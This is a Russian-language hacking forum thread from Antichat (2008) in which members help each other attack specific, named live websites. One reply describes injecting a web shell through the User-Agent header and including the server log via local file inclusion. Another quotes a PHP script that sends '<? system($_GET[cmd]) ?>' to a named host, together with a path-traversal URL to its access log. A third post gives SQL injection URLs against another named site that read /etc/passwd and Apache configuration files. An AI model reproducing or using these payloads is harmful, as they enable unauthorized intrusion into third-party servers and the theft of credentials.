HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3431  
Старый 03.10.2008, 19:40
bq1foe
Познающий
Регистрация: 18.02.2008
Сообщений: 54
С нами: 9593322

Репутация: 17
По умолчанию

С заливкой файлов облом.Скуль в принцепе тоже безполезна,т.к. пассов там нет, они хранятся хер знает где (где именно записано в конфиг.пхп((
А про то как в логи записать свой код можно по подробней?
 
Ответить с цитированием

  #3432  
Старый 03.10.2008, 22:06
bq1foe
Познающий
Регистрация: 18.02.2008
Сообщений: 54
С нами: 9593322

Репутация: 17
По умолчанию

Так я видать чего то не допонял) Сам access.log я нашел и успешно заинклудил но так и не понял чем мне он может помочь
 
Ответить с цитированием

  #3433  
Старый 03.10.2008, 22:15
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию

Подставляй вместо своего юзер агента пхп код инклудящий шелл. Твой заход на сайт запишется в логи, и потом уже их инклудь. Самый простой вариант - скачай программу Minibrowser, там в настройках в поле для юзер агента впиши пхп код, и сделай несколько заходов с него на сайт.
__________________
..
 
Ответить с цитированием

  #3434  
Старый 03.10.2008, 22:24
procedure
Banned
Регистрация: 22.12.2007
Сообщений: 660
С нами: 9677126

Репутация: 1158


По умолчанию

Цитата:
Первые успехи

Если локальный шелл никаким образом залить нельзя, то отчего же не внедрить нужный код прямо в лог, а потом заинклудить его с помощью уже известной баги? Итак, сооружаем небольшой php-скрипт для отсылки нужного нам кода:

<?

$site='i.tjat.com'; //адрес сайта

$path='/'; //путь к уязвимому скрипту

$inject='<? system($_GET[cmd]) ?>'; //php-инъекция

$fp = fsockopen($site, 80, $errno, $errstr, 30))

$out = "GET $path HTTP/1.1\r\n";

0$out .= "Host: $site\r\n";

$out .= "Connection: Close\r\n";

$out .= "User-Agent: $inject\r\n\r\n";

fwrite($fp, $out);

fclose($fp);

?>

Запустив этот скрипт у себя на локалхосте и убедившись в том, что он сработал, я соорудил ядовитую ссылку:

http://wap.tjat.com/?lang=ru/../../../../../../../../../../../../../usr/local/apache/logs/imode_icq.com-access_log

Перейдя по ней, я крупно обломался, поскольку на сервере был включен php safe_mode. Но, как ты догадываешься, дорогой читатель, это меня не остановило .
http://www.xakep.ru/magazine/xa/101/086/1.asp
 
Ответить с цитированием

  #3435  
Старый 03.10.2008, 22:57
bq1foe
Познающий
Регистрация: 18.02.2008
Сообщений: 54
С нами: 9593322

Репутация: 17
По умолчанию

Попробывал.Ничего не вышло,поковырялся в логах, там походу агенты не сохраняются вобще.
 
Ответить с цитированием

  #3436  
Старый 03.10.2008, 23:06
frigid20
Новичок
Регистрация: 19.01.2008
Сообщений: 19
С нами: 9636717

Репутация: 11
По умолчанию

помогите развить дальше
http://www.vodnik.info/article.php?aid=-1'+union+select+1,2,3,4,5,6,7,8,9+/*
с помощью такого запроса прочитад passwd http://www.vodnik.info/article.php?aid=-1'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9+/*

конфиг апача - http://www.vodnik.info/article.php?aid=-1%27+union+select+1,load_file(%27/etc/httpd/conf/httpd.conf%27),3,4,5,6,7,8,9+/*
в нем виртуальные хосты в них дырок найти не смог.

узнав пути расположения сайтов на серваке попытался прочитать страницу http://www.vodnik.info/article.php?aid=-1%27+union+select+1,load_file(%27/home/vodnik/vodnik-www/login.php%27),3,4,5,6,7,8,9+/*
судя по исходному коду где то есть инклуды
include_once("includes.inc.php");
include_once("login_control.php");
как найти путь к ним?.. может я не то и нетам ищу?

Последний раз редактировалось frigid20; 03.10.2008 в 23:50..
 
Ответить с цитированием

  #3437  
Старый 03.10.2008, 23:33
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

frigid20, Это не инклюды, точнее инклюды, как функции, а не как уязвимость)
 
Ответить с цитированием

  #3438  
Старый 03.10.2008, 23:37
frigid20
Новичок
Регистрация: 19.01.2008
Сообщений: 19
С нами: 9636717

Репутация: 11
По умолчанию

Цитата:
Сообщение от n0ne  
frigid20, Это не инклюды, точнее инклюды, как функции, а не как уязвимость)
я не про то что уязвимость - инклуды а про то можно ли их прочитать.. судя по всему в них валяются данные базы
 
Ответить с цитированием

  #3439  
Старый 03.10.2008, 23:53
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

frigid20, а, ну да. Эти файлы лежать в той же папке, что и файл, в котором ты нашел эти инклюды.
 
Ответить с цитированием

  #3440  
Старый 03.10.2008, 23:58
frigid20
Новичок
Регистрация: 19.01.2008
Сообщений: 19
С нами: 9636717

Репутация: 11
По умолчанию

Цитата:
Сообщение от n0ne  
frigid20, а, ну да. Эти файлы лежать в той же папке, что и файл, в котором ты нашел эти инклюды.
по крайней мере через load_file они не читаются.. есть еще какие то способы?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...